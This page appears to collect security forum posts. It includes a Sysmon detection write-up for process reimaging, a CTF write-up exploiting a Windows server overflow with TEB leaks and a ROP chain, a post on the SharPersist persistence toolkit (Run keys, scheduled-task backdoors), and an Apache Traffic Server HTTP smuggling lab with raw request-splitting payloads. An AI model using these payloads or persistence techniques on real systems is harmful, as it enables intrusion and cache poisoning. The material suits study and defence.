malicious activity. After process reimaging, and an application calls the GetMappedFileName API to retrieve the process image file, Windows will send back the incorrect file path. A correlation can be made between the Image field in Event ID 1 and the ImageLoaded field in Event ID 7. Since Event ID 1 and 7 both have the OriginalFileName field, an analyst can execute a JOIN on the data for both events. On this JOIN the results will show that the same process path of the process being created and the Image of the process being loaded should equal. With this correlation, one can determine that these two events are from the same activity subset. The correlation above follows this portion of the attack: Function section we are basing Detection from: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ Although a relationship can be made using Sysmon Event ID 1 and Sysmon Event ID 7, another relationship can be made based on the user mode API NtCreateFile. This will go through the event registration mechanism FltRegisterFilter which creates an Event ID 11 — File Creation in Sysmon. This relationship can be correlated on Sysmon Event ID 1’s Image field, which should match Sysmon Event ID 11’s TargetFilename. Sysmon Event ID 1’s ParentProcessGuid should also match Sysmon Event ID 11’s ProcessGuid to ensure the events are both caused by the same process. Now that the research is done, the hypotheses have to be tested. Data Analytics: Below shows the command of the attack being executed. The process (phase1.exe) was created by loading a binary (svchost.exe), then reimaged as lsass.exe. .\CSProcessReimagingPOC.exe C:\Windows\System32\svchost.exe C:\Windows\System32\lsass.exe The following SparkSQL code is the analytics version of what was discussed above: Query ran utilizing Jupyter Notebooks and SparkSQL. Gist I tried to make the JOIN functions as readable to the user as possible. One thing to note is that this query is pulling from the raw data logs within Sysmon. No transformations are being performed within a SIEM pipeline. Below is a visual representation of the joins and data correlations being done within Jupyter Notebooks utilizing SparkSQL. This query was also checked if a file created is subsequently moved to a different directory, as well if the OriginalFileName of a file didn’t equal the Image for Sysmon Event ID 1.(e.g: created process with Image — “ApplyTrustOffline.exe” and OriginalFileName — “ApplyTrustOffline.PROGRAM”) After these checks the query will only bring back the results of the reimaging attack. Graphed View of JOINs in Query The output of the SQL query above can be seen below. You find in the query output of data after the attack seems to have “duplicates” of the events. This isn’t the case. Each time the attack is run, there will be a Sysmon Event ID 11 — FileCreate that fires after each Sysmon Event ID 1 -Process Creation. This correlates to the behavior of the attack that was discussed above. Query Output The dataset and Jupyter Notebook that correlates with the following analysis is available on my GitHub. I encourage anyone to pull it down to analyze the data for themselves. If you don’t have a lab to test it in, one can be found here: https://github.com/jsecurity101/mordor/tree/master/environment/shire/aws. Below breaks down the stages and the information of the dataset that was ran. This correlates with the query that was ran above: One thing to keep in mind is when the malicious binary is reimaged to the binary of the adversaries choosing (stage 3), you will not see that “phase1.exe” was reimaged to “lsass.exe”. This is the behavior of the attack; Windows will send back the improper file object. This doesn’t debunk this detection. The goal is to discover the behavior of the attack, and once that is done you can either follow the ProcessGuid of “phase1.exe” or go to its full path to find the Image of the binary it was reimaged with. “Phase1.exe” will appear under the context of that reimaged binary. Image of the properties of phase1.exe after reimaging is executed Conclusion: Process Reimaging really piqued my interest as it seemed to be focused on flying under the radar to avoid detection. Each technique an attacker leverages will have data that follows the behavior of the attack. This can be leveraged, but only once we understand our data and data sources. Moving away from signature based hunts to more of the data driven hunt methodology will help with the robustness of detections. Thank You: Huge thank you to Matt Graeber for helping me with the reverse engineering process of the Sysmon Driver. To Dwight Hohnstein, for his POC code. Lastly, to Brian Reitz for helping when SQL wasn’t behaving. References/Resources: In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass Dwight’s Process Reimaging POC Microsoft Docs Posts By SpecterOps Team Members Written by Jonathan Johnson Posts By SpecterOps Team Members Posts from SpecterOps team members on various topics relating information security Sursa: https://posts.specterops.io/you-can-run-but-you-cant-hide-detecting-process-reimaging-behavior-e6bb9a10c40b
    1 point
  6. Writeup for the BFS Exploitation Challenge 2019 Table of Contents Introduction TL;DR Initial Dynamic Analysis Statically Identifying the Vulnerability Strategy Preparing the Exploit Building a ROP Chain See Exploit in Action Contact Introduction Having enjoyed and succeeded in solving a previous BFS Exploitation Challenge from 2017, I've decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64 bit executable for which an exploit is expected to work on a Windows 10 Redstone machine. The challenge's goals were set to: Bypass ASLR remotely Achieve arbitrary code execution (pop calc or notepad) Have the exploited process properly continue its execution TL;DR Spare me all the boring details, I want to grab a copy of the challenge study the decompiled code study the exploit Initial Dynamic Analysis Running the file named 'eko2019.exe' opens a console application that seemingly waits for and accepts incoming connections from (remote) network clients. Quickly checking out the running process' security features using Sysinternals Process Explorer shows that DEP and ASLR are enabled, but Control Flow Guard is not. Good. Further checking out the running process dynamically using tools such as Sysinternals TCPView, Process Monitor or simply running netstat could have been an option right now, but personally I prefer diving directly into the code using my static analysis tool of choice, IDA Pro (I recommended following along with your favourite disassembler / decompiler). Statically Identifying the Vulnerability Having disassembled the executable file and looking at the list of identified functions, the maximum number of functions that need to be analyzed for weaknesses was as little as 17 functions out of 188 in total - with the remaining ones being known library functions, imported functions and the main() function itself. Navigating to and running the disassembled code's main() function through the Hex-Rays decompiler and putting some additional effort into renaming functions, variables and annotating the code resulted in the following output: By looking at the code and annotations shown in the screenshot above, we can see there is a call to a function in line 19 which creates a listening socket on TCP port 54321, shortly followed by a call to accept() in line 27. The socket handle returned by accept() is then passed as an argument to a function handle_client() in line 36. Keeping in mind the goals of this challenge, this is probably where the party is going to happen, so let's have a look at it. As an attacker, what we are going to look for and concentrate on are functions within the server's executable code that process any kind of input that is controlled client-side. All with the goal in mind of identifying faulty program logic that hopefully can be taken advantage of by us. In this case, it is the two calls to the recv() function in lines 21 and 30 in the screenshot above which are responsible for receiving data from a remote network client. The first call to recv() in line 21 receives a hard-coded number of 16 bytes into a "header" structure. It consists of three distinct fields, of which the first one at offset 0 is "magic", a second at offset 8 is "size_payload" and the third is unused. By accessing the "magic" field in line 25 and comparing it to a constant value "Eko2019", the server ensures basic protocol compatibility between connected clients and the server. Any client packet that fails in complying with this magic constant as part of the "header" packet is denied further processing as a consequence. By comparing the "size_payload" field of the "header" structure to a constant value in line 27, the server limits the field's maximum allowed value to 512. This is to ensure that a subsequent call to recv() in line 30 receives a maximum number of 512 bytes in total. Doing so prevents the destination buffer "buf" from being written to beyond its maximum size of 512 bytes - too bad! If this sanity check wasn't present, it would have allowed us to overwrite anything that follows the "buf" buffer, including the return address to main() on the stack. Overwriting the saved return address could have resulted in straightforward and reliable code execution. Skimming through this function's remaining code (and also through all the other remaining functions) doesn't reveal any more code that'd process client-side input in any obviously dangerous way, either. So we must probably have overlooked something and -yes you guessed it- it's in the processing of the "pkthdr" structure. A useful pointer to what the problem could be is provided by the hint window that appears as soon as the mouse is hovered over the comparison operator in line 27. As it turns out, it is a signed integer comparison, which means the size restriction of 512 can successfully be bypassed by providing a negative number along with the header packet in "size_payload"! Looking further down the code at line 30, the "size_payload" variable is typecast to a 16 bit integer type as indicated by the decompiler's LOWORD() macro. Typecasting the 32 bit "size_payload" variable to a 16 bit integer effectively cuts off its upper 16 bits before it is passed as a size argument to recv(). This enables an attacker to cause the server to accept payload data with a size of up to 65535 bytes in total. Sending the server a respectively crafted packet effectively bypasses the intended size restriction of 512 bytes and successfully overwrites the "buf" variable on the stack beyond its intended limits. If we wanted to verify the decompiler's results or if we refrained from using a decompiler entirely because we preferred sharpening or refreshing our assembly comprehension skills instead, we could just as well have a look at the assembler code: the "jle" instruction indicates a signed integer comparison the "movzx eax, word ptr..." instruction moves 16 bits of data from a data source to a 32 bit register eax, zero extending its upper 16 bits. Alright, before we can start exploiting this vulnerability and take control of the server process' instruction pointer, we need to find a way to bypass ASLR remotely. Also, by checking out the handle_client() function's prologue in the disassembly, we can see there is a stack cookie that will be checked by the function's epilogue which eventually needs to be taken care of . Strategy In order to bypass ASLR, we need to cause the server to leak an address that belongs to its process space. Fortunately, there is a call to the send() function in line 45, which sends 8 bytes of data, so exactly the size of a pointer in 64 bit land. That should serve our purpose just fine. These 8 bytes of data are stored into a _QWORD variable "gadget_buf" as the result of a call to the exec_gadget() function in line 44. Going further up the code to line 43, we can see self-modifying code that uses the WriteProcessMemory() API function to patch the exec_gadget() function with whatever data "gadget_buf" contains. The "gadget_buf" variable in turn is the result of a call to the copy_gadget() function in line 41 which is passed the address of a global variable "g_gadget_array" as an argument. Looking at the copy_gadget() function's decompiled code reveals that it takes an integer argument, swaps its endianness and then returns the result to the caller. In summary, whatever 8 bytes the "g_gadget_array" at position "gadget_idx % 256" points to will be executed by the call to exec_gadget() and its result is then sent back to the connected client. Looking at the cross references to "g_gadget_array" which is only initialized during run-time, we can find a for loop that initializes 256 elements of the array "g_gadget_array" as part of the server's main() function: Going back to the handle_client() function, we find that the "gadget_idx" variable is initialized with 62, which means that a gadget pointed to by "p_gadget_array[62]" is executed by default. The strategy is getting control of the "gadget_idx" variable. Luckily, it is a stack variable adjacent to the "buf[512]" variable and thus can be written to by sending the server data that exceeds the "buf" variable's maximum size of 512 bytes. Having "gadget_idx" under control allows us to have the server execute a gadget other than the default one at index 62 (0x3e). In order to be able to find a reasonable gadget in the first place, I wrote a little Python script that mimics the server's initialization of "g_gadget_array" and then disassembles all its 256 elements using the Capstone Engine Python bindings: I spent quite some time reading the resulting list of gadgets trying to find a suitable gadget to be used for leaking a qualified pointer from the running process, but with partial success only. Knowing I must have been missing something, I still settled with a gadget that would manage to leak the lower 32 bits of a 64 bit pointer only, for the sake of progressing and then fixing it the other day: Using this gadget would modify the pointer that is passed to the call to exec_gadget(), making it point to a location other than what the "p" pointer usually points to, which could then be used to leak further data. Based on working around some limitations by hard-coding stuff, I still managed to develop quite a stable exploit including full process continuation. But it was only after a kind soul asked me whether I hadn't thought of reading from the TEB that I got on the right track to writing an exploit that is more than just quite stable. Thank you Preparing the Exploit The TEB holds vital information that can be used for bypassing ASLR, and it is accessed via the gs segment register on 64 bit Windows systems. Looking through the list of gadgets for any occurence of "gs:" yields a single hit at index 0x65 of the "g_gadget_array" pointer. Acquiring the current thread's TEB address is possible by reading from gs:[030h]. In order to have the gadget that is shown in the screenshot above to do so, the rcx register must first be set to 0x30. The rcx register is the first argument to the exec_gadget() function, which is loaded from the "p" variable on the stack. Like the "gadget_idx variable", "p" is adjacent to the overflowable buffer, hence overwritable as well. Great. By sending a particularly crafted sequence of network packets, we are now given the ability to leak arbitrary data of the server thread's TEB structure. For example, by sending the following packet to the server, gadget number 0x65 will be called with rcx set to 0x30. [0x200*'A'] + ['\x65\x00\x00\x00\x00\x00\x00\x00'] + ['\x30\x00\x00\x00\x00\x00\x00\x00'] Sending this packet will overwrite the target thread's following variables on the stack and will cause the server to send us the current thread's TEB address: [buf] + [gadget_idx] + [p] The following screenshot shows the Python implementation of the leak_teb() function used by the exploit. With the process' TEB address leaked to us, we are well prepared for leaking further information by using the default gagdet 62 (0x3e), which dereferences arbitrary 64 bits of process memory pointed to by rcx per request: In turn, leaking arbitrary memory allows us to bypass DEP and ASLR identify the stack cookie's position on the stack leak the stack cookie locate ourselves on the stack eventually run an external process In order to bypass ASLR, the "ImageBaseAddress" of the target executable must be acquired from the Process Environment Block which is accessible at gs:[060h]. This will allow for relative addressing of the individual ROP gadgets and is required for building a ROP chain that bypasses Data Execution Prevention. Based on the executable's in-memory "ImageBaseAddress", the address of the WinExec() API function, as well as the stack cookie's xor key can be leaked. What's still missing is a way of acquiring the stack cookie from the current thread's stack frame. Although I knew that the approach was faulty, I had initially leaked the cookie by abusing the fact that there exists a reliable pointer to the formatted text that is created by any preceding call to the printf() function. By sending the server a packet that solely consisted of printable characters with a size that would overflow the entire stack frame but stopping right before the stack cookie's position, the call to printf() would leak the stack cookie from the stack into the buffer holding the formatted text whose address had previously been acquired. While this might have been an interesting approach, it is an approach that is error-prone because if the cookie contained any null-bytes right in the middle, the call to printf() will make a partial copy of the cookie only which would have caused the exploit to become unreliable. Instead, I've decided to leak both "StackBase" and "StackLimit" from the TIB which is part of the TEB and walk the entire stack, starting from StackLimit, looking for the first occurence of the saved return address to main(). Relative from there, the cookie that belongs to the handle_client() function's stack frame can be addressed and subsequently leaked to our client. Having a copy of the cookie and a copy of the xor key at hand will allow the rsp register to be recovered, which can then be used to build the final ROP chain. Building a ROP Chain Now that we know how to leak all information from the vulnerable process that is required for building a fully working exploit, we can build a ROP chain and have it cause the server to pop calc. Using ROPgadget, a list of gadgets was created which was then used to craft the following chain: The ROP chain starts at "entry_point", which is located at offset 0x230 of the vulnerable function's "buf" variable and which previously contained the orignal return address to main(). It loads "ptr_to_chain" at offset 0x228 into the rsp register which effectively lets rsp point into the next gadget at 2.). Stack pivoting is a vital step in order to avoid trashing the caller's stack frame. Messing up the caller's frame would risk stable process continuation This gadget loads the address of a "pop rax" gadget into r12 in preparation for a "workaround" that is required in order to compensate for the return address that is pushed onto the stack by the call r12 instruction in 4.). A pointer to "buf" is loaded into rax, which now points to the "calc\0" string The pointer to "calc\0" is copied to rcx which is the first argument for the subsequent API call to WinExec() in 5.). The call to r12 pushes a return address on the stack and causes a "pop rax" gadget to be executed which will pop the address off of the stack again This gadget causes the WinExec() API function to be called The call to WinExec() happens to overwrite some of our ROP chain on the stack, hence the stack pointer is adjusted by this gadget to skip the data that is "corrupted" by the call to WinExec() The original return address to main()+0x14a is loaded into rax rbx is loaded with the address of "entry_point" The original return address to main()+0x14a is restored by patching "entry_point" on the stack -> "mov qword ptr [entry_point], main+0x14a". After that, rsp is adjusted, followed by a few dummy bytes rsp is adjusted so it will slowly slide into its old position at offset 0x230 of "buf", in order to return to main() and guarantee process continuation see 10.) see 10.) see 10.) See Exploit in Action Contact Twitter Sursa: https://github.com/patois/BFS2019
    1 point
  7. Threat Research SharPersist: Windows Persistence Toolkit in C# September 03, 2019 | by Brett Hawkins powershell persistence Toolkit Windows Background PowerShell has been used by the offensive community for several years now but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, Antimalware Scripting Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant’s Red Team called SharPersist. Windows Persistence During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1. Figure 1: FireEye Attack Lifecycle Diagram Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lay dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service. There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, registry, and startup folder, and there continues to be more discovered. For a more thorough list, see the MITRE ATT&CK persistence page. Figure 2: Persistence equation SharPersist Overview SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike’s “execute-assembly” functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built-in to the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden. SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page. SharPersist Persistence Techniques There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3. Technique Description Technique Switch Name (-t) Admin Privileges Required? Touches Registry? Adds/Modifies Files on Disk? KeePass Backdoor KeePass configuration file keepass No No Yes New Scheduled Task Creates new scheduled task schtask No No Yes New Windows Service Creates new Windows service service Yes Yes No Registry Registry key/value creation/modification reg No Yes No Scheduled Task Backdoor Backdoors existing scheduled task with additional action schtaskbackdoor Yes No Yes Startup Folder Creates LNK file in user startup folder startupfolder No No Yes Tortoise SVN Creates Tortoise SVN hook script tortoisesvn No Yes No Figure 3: Table of supported persistence techniques SharPersist Examples On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below. Registry Persistence The first technique that will be highlighted is the registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4. Registry Key Code (-k) Registry Key Registry Value Admin Privileges Required? Supports Env Optional Add-On (-o env)? hklmrun HKLM\Software\Microsoft\Windows\CurrentVersion\Run User supplied Yes Yes hklmrunonce HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce User supplied Yes Yes hklmrunonceex HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx User supplied Yes Yes userinit HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit Yes No hkcurun HKCU\Software\Microsoft\Windows\CurrentVersion\Run User supplied No Yes hkcurunonce HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce User supplied No Yes logonscript HKCU\Environment UserInitMprLogonScript No No stickynotes HKCU\Software\Microsoft\Windows\CurrentVersion\Run RESTART_STICKY_NOTES No No Figure 4: Supported registry keys table In the following example, we will be performing a validation of our arguments and then will add registry persistence. Performing a validation before adding the persistence is a best practice, as it will make sure that you have the correct arguments, and other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named “Test” with the value “cmd.exe /c calc.exe” in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key. Figure 5: Adding registry persistence Once the persistence needs to be removed, it can be removed using the “-m remove” argument, as shown in Figure 6. We are removing the “Test” registry value that was created previously, and then we are listing all registry values in “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” to validate that it was removed. Figure 6: Removing registry persistence Startup Folder Persistence The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called “Test.lnk” that will be placed in the current user’s startup folder and will execute “cmd.exe /c calc.exe”, shown in Figure 7. Figure 7: Performing dry-run and adding startup folder persistence The startup folder persistence can then be removed, again using the “-m remove” argument, as shown in Figure 8. This will remove the LNK file from the current user’s startup folder. Figure 8: Removing startup folder persistence Scheduled Task Backdoor Persistence The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9. Figure 9: Listing scheduled tasks that run at logon Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will successfully work and then actually execute the command as shown in Figure 10. Figure 10: Performing dry run and adding scheduled task backdoor persistence As you can see in Figure 11, the scheduled task is now backdoored with our malicious action. Figure 11: Listing backdoored scheduled task A backdoored scheduled task action used for persistence can be removed as shown in Figure 12. Figure 12: Removing backdoored scheduled task action Conclusion Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community and persistence is no exception. Windows provides multiple techniques for persistence and there will continue to be more discovered and used by security professionals and adversaries alike. This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell. Sursa: https://www.fireeye.com/blog/threat-research/2019/09/sharpersist-windows-persistence-toolkit.html
    1 point
  8. Security: HTTP Smuggling, Apache Traffic Server Sept 17, 2019 english and security details of CVE-2018-8004 (August 2018 - Apache Traffic Server). What is this about ? Apache Traffic Server ? Fixed versions of ATS CVE-2018-8004 Step by step Proof of Concept Set-up the lab: Docker instances Test That Everything Works Request Splitting by Double Content-Length Request Splitting by NULL Character Injection Request Splitting using Huge Header, Early End-Of-Query Cache Poisoning using Incomplete Queries and Bad Separator Prefix Attack schema HTTP Response Splitting: Content-Length Ignored on Cache Hit Attack schema Timeline See also English version (Version Française disponible sur makina corpus). estimated read time: 15 min to really more What is this about ? This article will give a deep explanation of HTTP Smuggling issues present in CVE-2018-8004. Firstly because there's currently not much informations about it ("Undergoing Analysis" at the time of this writing on the previous link). Secondly some time has passed since the official announce (and even more since the availability of fixs in v7), also mostly because I keep receiving demands on what exactly is HTTP Smuggling and how to test/exploit this type of issues, also beacause Smuggling issues are now trending and easier to test thanks for the great stuff of James Kettle (@albinowax). So, this time, I'll give you not only details but also a step by step demo with some DockerFiles to build your own test lab. You could use that test lab to experiment it with manual raw queries, or test the recently added BURP Suite Smuggling tools. I'm really a big partisan of always searching for Smuggling issues in non production environements, for legal reasons and also to avoid unattended consequences (and we'll see in this article, with the last issue, that unattended behaviors can always happen). Apache Traffic Server ? Apache Traffic Server, or ATS is an Open Source HTTP load balancer and Reverse Proxy Cache. Based on a Commercial product donated to the Apache Foundation. It's not related to Apache httpd HTTP server, the "Apache" name comes from the Apache foundation, the code is very different from httpd. If you were to search from ATS installations on the wild you would find some, hopefully fixed now. Fixed versions of ATS As stated in the CVE announce (2018-08-28) impacted ATS versions are versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. Version 7.1.4 was released in 2018-08-02 and 6.2.3 in 2018-08-04. That's the offical announce, but I think 7.1.3 contained most of the fixs already, and is maybe not vulnerable. The announce was mostly delayed for 6.x backports (and some other fixs are relased in the same time, on other issues). If you wonder about previous versions, like 5.x, they're out of support, and quite certainly vulnerable. Do not use out of support versions. CVE-2018-8004 The official CVE description is: There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS. Which does not gives a lot of pointers, but there's much more information in the 4 pull requests listed: #3192: Return 400 if there is whitespace after the field name and before the colon #3201: Close the connection when returning a 400 error response #3231: Validate Content-Length headers for incoming requests #3251: Drain the request body if there is a cache hit If you already studied some of my previous posts, some of these sentences might already seems dubious. For example not closing a response stream after an error 400 is clearly a fault, based on the standards, but is also a good catch for an attacker. Chances are that crafting a bad messages chain you may succeed at receiving a response for some queries hidden in the body of an invalid request. The last one, Drain the request body if there is a cache hit is the nicest one, as we will see on this article, and it was hard to detect. My original report listed 5 issues: HTTP request splitting using NULL character in header value HTTP request splitting using huge header size HTTP request splitting using double Content-length headers HTTP cache poisoning using extra space before separator of header name and header value HTTP request splitting using ...(no spoiler: I keep that for the end) Step by step Proof of Concept To understand the issues, and see the effects, We will be using a demonstration/research environment. If you either want to test HTTP Smuggling issues you should really, really, try to test it on a controlled environment. Testing issues on live environments would be difficult because: You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your success and errors. You may triggers errors and behaviors that you have no idea about, for example I have encountered random errors on several fuzzing tests (on test envs), unreproductible, before understanding that this was related to the last smuggling issue we will study on this article. Effects were delayed on subsequent tests, and I was not in control, at all. You may trigger errors on requests sent by other users, and/or for other domains. That's not like testing a self reflected XSS, you could end up in a court for that. Real life complete examples usually occurs with interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Nodejs, etc. You will have to understand how each actor interact with the other, and you will see it faster with a local low level network capture than blindly accross an unknown chain of agents (like for example to learn how to detect each agent on this chain). So it's very important to be able to rebuild a laboratory env. And, if you find something, this env can then be used to send detailled bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues, a working demo helps). Set-up the lab: Docker instances We will run 2 Apache Traffic Server Instance, one in version 6.x and one in version 7.x. To add some alterity, and potential smuggling issues, we will also add an Nginx docker, and an HaProy one. 4 HTTP actors, each one on a local port: 127.0.0.1:8001 : HaProxy (internally listening on port 80) 127.0.0.1:8002 : Nginx (internally listening on port 80) 127.0.0.1:8007 : ATS7 (internally listening on port 8080) 127.0.0.1:8006 : ATS6 (internally listening on port 8080), most examples will use ATS7, but you will ba able to test this older version simply using this port instead of the other (and altering the domain). We will chain some Reverse Proxy relations, Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (dummy-host7.example.com for ATS7 and dummy-host6.example.com for ATS6) Note that the localhost port mapping of the ATS and Nginx instances are not directly needed, if you can inject a request to Haproxy it will reach Nginx internally, via port 8080 of one of the ATS, and port 80 of Nginx. But that could be usefull if you want to target directly one of the server, and we will have to avoid the HaProxy part on most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on 8007. Later you can try to suceed targeting 8001, that will be harder. +---[80]---+ | 8001->80 | | HaProxy | | | +--+---+---+ [dummy-host6.example.com] | | [dummy-host7.example.com] +-------+ +------+ | | +-[8080]-----+ +-[8080]-----+ | 8006->8080 | | 8007->8080 | | ATS6 | | ATS7 | | | | | +-----+------+ +----+-------+ | | +-------+-------+ | +--[80]----+ | 8002->80 | | Nginx | | | +----------+ To build this cluster we will use docker-compose, You can the find the docker-compose.yml file here, but the content is quite short: version: '3' services: haproxy: image: haproxy:1.6 build: context: . dockerfile: Dockerfile-haproxy expose: - 80 ports: - "8001:80" links: - ats7:linkedats7.net - ats6:linkedats6.net depends_on: - ats7 - ats6 ats7: image: centos:7 build: context: . dockerfile: Dockerfile-ats7 expose: - 8080 ports: - "8007:8080" depends_on: - nginx links: - nginx:linkednginx.net ats6: image: centos:7 build: context: . dockerfile: Dockerfile-ats6 expose: - 8080 ports: - "8006:8080" depends_on: - nginx links: - nginx:linkednginx.net nginx: image: nginx:latest build: context: . dockerfile: Dockerfile-nginx expose: - 80 ports: - "8002:80" To make this work you will also need the 4 specific Dockerfiles: Docker-haproxy: an HaProxy Dockerfile, with the right conf Docker-nginx: A very simple Nginx Dockerfile with one index.html page Docker-ats7: An ATS 7.1.1 compiled from archive Dockerfile Docker-ats6: An ATS 6.2.2 compiled from archive Dockerfile Put all theses files (the docker-compose.yml and the Dockerfile-* files) into a working directory and run in this dir: docker-compose build && docker-compose up You can now take a big break, you are launching two compilations of ATS. Hopefully the next time a up will be enough, and even the build may not redo the compilation steps. You can easily add another ats7-fixed element on the cluster, to test fixed version of ATS if you want. For now we will concentrate on detecting issues in flawed versions. Test That Everything Works We will run basic non attacking queries on this installation, to check that everything is working, and to train ourselves on the printf + netcat way of running queries. We will not use curl or wget to run HTTP query, because that would be impossible to write bad queries. So we need to use low level string manipulations (with printf for example) and socket handling (with netcat -- or nc --). Test Nginx (that's a one-liner splitted for readability): printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8002 You should get the index.html response, something like: HTTP/1.1 200 OK Server: nginx/1.15.5 Date: Fri, 26 Oct 2018 15:28:20 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT Connection: keep-alive ETag: "5bd321bc-78" X-Location-echo: / X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Then test ATS7 and ATS6: printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8007 printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8006 Then test HaProxy, altering the Host name should make the transit via ATS7 or ATS6 (check the Server: header response): printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8001 printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8001 And now let's start a more complex HTTP stuff, we will make an HTTP pipeline, pipelining several queries and receiving several responses, as pipelining is the root of most smuggling attacks: # send one pipelined chain of queries printf 'GET /?cache=1 HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /?cache=2 HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /?cache=3 HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ 'GET /?cache=4 HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 127.0.0.1 8001 This is pipelining, it's not only using HTTP keepAlive, because we send the chain of queries without waiting for the responses. See my previous post for detail on Keepalives and Pipelining. You should get the Nginx access log on the docker-compose output, if you do not rotate some arguments in the query nginx wont get reached by your requests, because ATS is caching the result already (CTRL+C on the docker-compose output and docker-compose up will remove any cache). Request Splitting by Double Content-Length Let's start a real play. That's the 101 of HTTP Smuggling. The easy vector. Double Content-Length header support is strictly forbidden by the RFC 7230 3.3.3 (bold added): 4 If a message is received without Transfer-Encoding and with either multiple Content-Length header fields having differing field-values or a single Content-Length header field having an invalid value, then the message framing is invalid and the recipient MUST treat it as an unrecoverable error. If this is a request message, the server MUST respond with a 400 (Bad Request) status code and then close the connection. If this is a response message received by a proxy, the proxy MUST close the connection to the server, discard the received response, and send a 502 (Bad Gateway) response to the client. If this is a response message received by a user agent, the user agent MUST close the connection to the server and discard the received response. Differing interpretations of message length based on the order of Content-Length headers were the first demonstrated HTTP smuggling attacks (2005). Sending such query directly on ATS generates 2 responses (one 400 and one 200): printf 'GET /index.html?toto=1 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Content-Length: 0\r\n'\ 'Content-Length: 66\r\n'\ '\r\n'\ 'GET /index.html?toto=2 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 The regular response should be one error 400. Using port 8001 (HaProxy) would not work, HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick. This is Critical Request Splitting, classical, but hard to reproduce in real life environment if some robust tools are used on the reverse proxy chain. So, why critical? Because you could also consider ATS to be robust, and use a new unknown HTTP server behind or in front of ATS and expect such smuggling attacks to be properly detected. And there is another factor of criticality, any other issue on HTTP parsing can exploit this Double Content-Length. Let's say you have another issue which allows you to hide one header for all other HTTP actors, but reveals this header to ATS. Then you just have to use this hidden header for a second Content-length and you're done, without being blocked by a 